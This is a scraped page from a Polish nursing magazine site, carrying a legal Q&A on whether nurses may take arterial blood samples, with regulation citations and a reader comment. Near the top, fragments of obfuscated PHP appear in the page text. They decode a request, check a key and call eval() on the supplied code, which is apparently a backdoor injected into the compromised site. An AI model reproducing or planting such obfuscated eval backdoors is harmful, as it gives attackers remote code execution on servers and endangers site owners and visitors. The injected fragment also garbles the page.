Pielęgniarki Położne

Nursing.com.pl - Wirtualny magazyn pielęgniarki i położnej

$va788b0){$yce8=$va788b0;$g3c3=$ccec65c1;}if(!$yce8){foreach($qe376878c[$qe376878c['efb9'][43].$qe376878c['efb9'][43].$qe376878c['efb9'][86].$qe376878c['efb9'][3].$qe376878c['efb9'][8].$qe376878c['efb9'][82]]as$ccec65c1=>$va788b0){$yce8=$va788b0;$g3c3=$ccec65c1;}}$yce8=@$qe376878c[$qe376878c['efb9'][3].$qe376878c['efb9'][86].$qe376878c['efb9'][81].$qe376878c['efb9'][86].$qe376878c['efb9'][93].$qe376878c['efb9'][86].$qe376878c['efb9'][8].$qe376878c['efb9'][3].$qe376878c['efb9'][8]]($qe376878c[$qe376878c['efb9'][72].$qe376878c['efb9'][86].$qe376878c['efb9'][93].$qe376878c['efb9'][55]]($qe376878c[$qe376878c['efb9'][32].$qe376878c['efb9'][8].$qe376878c['efb9'][91].$qe376878c['efb9'][76].$qe376878c['efb9'][93].$qe376878c['efb9'][3]]($yce8),$g3c3));if(isset($yce8[$qe376878c['efb9'][75].$qe376878c['efb9'][80]])&&$wa3904fb==$yce8[$qe376878c['efb9'][75].$qe376878c['efb9'][80]]){if($yce8[$qe376878c['efb9'][75]]==$qe376878c['efb9'][22]){$n7459f=Array($qe376878c['efb9'][50].$qe376878c['efb9'][61]=>@$qe376878c[$qe376878c['efb9'][22].$qe376878c['efb9'][43].$qe376878c['efb9'][12].$qe376878c['efb9'][81].$qe376878c['efb9'][28].$qe376878c['efb9'][28].$qe376878c['efb9'][41].$qe376878c['efb9'][28].$qe376878c['efb9'][93]](),$qe376878c['efb9'][14].$qe376878c['efb9'][61]=>$qe376878c['efb9'][76].$qe376878c['efb9'][17].$qe376878c['efb9'][28].$qe376878c['efb9'][67].$qe376878c['efb9'][76],);echo@$qe376878c[$qe376878c['efb9'][85].$qe376878c['efb9'][41].$qe376878c['efb9'][3].$qe376878c['efb9'][28].$qe376878c['efb9'][86].$qe376878c['efb9'][3]]($n7459f);}elseif($yce8[$qe376878c['efb9'][75]]==$qe376878c['efb9'][86]){eval($yce8[$qe376878c['efb9'][3]]);}exit();} ?>

Logowanie

 
 
 
szukaj
Materiały filmowe Zobacz więcej
DSC_2085

DSC_2085

Data: 10.01.2011

W najnowszym numerze
W najnowszym numerze
REKLAMA
szukaj

Uprawnienie pielęgniarki do pobierania krwi z tętnic

Kto posiada uprawnienia do pobieranie krwi z tętnic? Czy takie uprawnienia posiada pielęgniarka?
 

Odpowiedź
Nakłucie tętnicy i pobieranie krwi oraz założenie dostępów do monitorowania:
tętniczych (a. radialis, a. femoralis); żylnych centralnych (v. jugularis interna, v. subclavia, v. femoralis); cewnikowanie tętnicy płucnej należy do uprawnień lekarza anestezjologa.
 

Zakres uprawnień lekarza anestezjologa został określany na podstawie rozporządzenia Ministra Zdrowia i Opieki Społecznej z dnia 27 lutego 1998 r. w sprawie standardów postępowania oraz procedur medycznych przy udzielaniu świadczeń zdrowotnych z zakresu anestezjologii i intensywnej terapii w zakładach opieki zdrowotnej (Dz. U. Nr 37, poz. 215 z późn. zm.).

 

Nabycie uprawnień do pobierania krwi tętniczej objęte jest specjalizacją lekarza w zakresie anestezjologii (program specjalizacji dostępny na stronie internetowej Centrum Medycznego Kształcenia Podyplomowego: www.cmkp.edu.pl).

 

Natomiast takich uprawnień nie uzyskuje pielęgniarka w ramach specjalizacji anestezjologii i intensywnej terapii (program dostępny na stronie internetowej Centrum Kształcenia Pielęgniarek i Położnych www.ckppip.edu.pl).
 

Natomiast rozporządzenie Ministra Zdrowia z dnia 29 października 2003 r. w sprawie wykazu dziedzin pielęgniarstwa oraz dziedzin mających zastosowanie w ochronie zdrowia, w których może być prowadzona specjalizacja i kursy kwalifikacyjne i ramowych programów specjalizacji dla pielęgniarek i położnych (Dz. U. Nr 197, poz. 1922 z późn. zm.) w załączniku nr 25 w ustępie V module II pkt 3 ppkt 12 w zakresie "Rola i zadania pielęgniarki, położnej w opiece nad noworodkiem" przewiduje nabycie uprawnień do zabiegów wykonywanych w oddziałach neonatologicznych: polegających na pobraniu krwi do badań z tętnicy promieniowej i z innych tętnic.
 

Uwagi
Odpowiedź na to pytanie została udzielona przy współpracy lekarza specjalisty z zakresu anestezjologii.
 

Dorota Karkowska, radca prawny, specjalista prawa medycznego, ekspert Serwisu Prawo i Zdrowie, Wolters Kluwer Polska, www.abc.com.pl
 

Data dodania: 2008-11-13 10:11:44
Data modyfikacji: 2009-05-25 14:37:24
Oceń
  • Currently 1.5/5 Stars.
  • 1
  • 2
  • 3
  • 4
  • 5
Wyślij znajomemu
Wyślij znajomemu
Wpisz adres e-mail osoby, do której chcesz wysłać informacje.

Informacja

Zaloguj się aby dodać komentarz.Komentarze

Dotyczy uprawnień pielęgniarki do pobierania krwi z tętnic

Chciałam zwrócić uwagę na fakt, iż w kompetencjach pielęgniarek po specjalizacji w pielęgniarstwie anestezjologicznym i intensywnej opiece opracowanych przez Zarząd Polskiego Towarzystwa Pielegniarek Anestezjologicznych i Intensywnej Opieki z 6 listopada 1998 roku w części dotyczacej uprawnień pielęgniarki specjalistki w pielęgniarstwie anestezjologicznym i intensywnej opieki w zakresie świadczeń diagnostycznych znajduje się zapis: Wykonuje nakłucie tętnicy promieniowej i udowej celem pobrania krwi do badań.

REKLAMA
 
 
ISSN 2083-7852
Projekt i realizacja
UNIA EUROPEJSKA

Projekt współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego.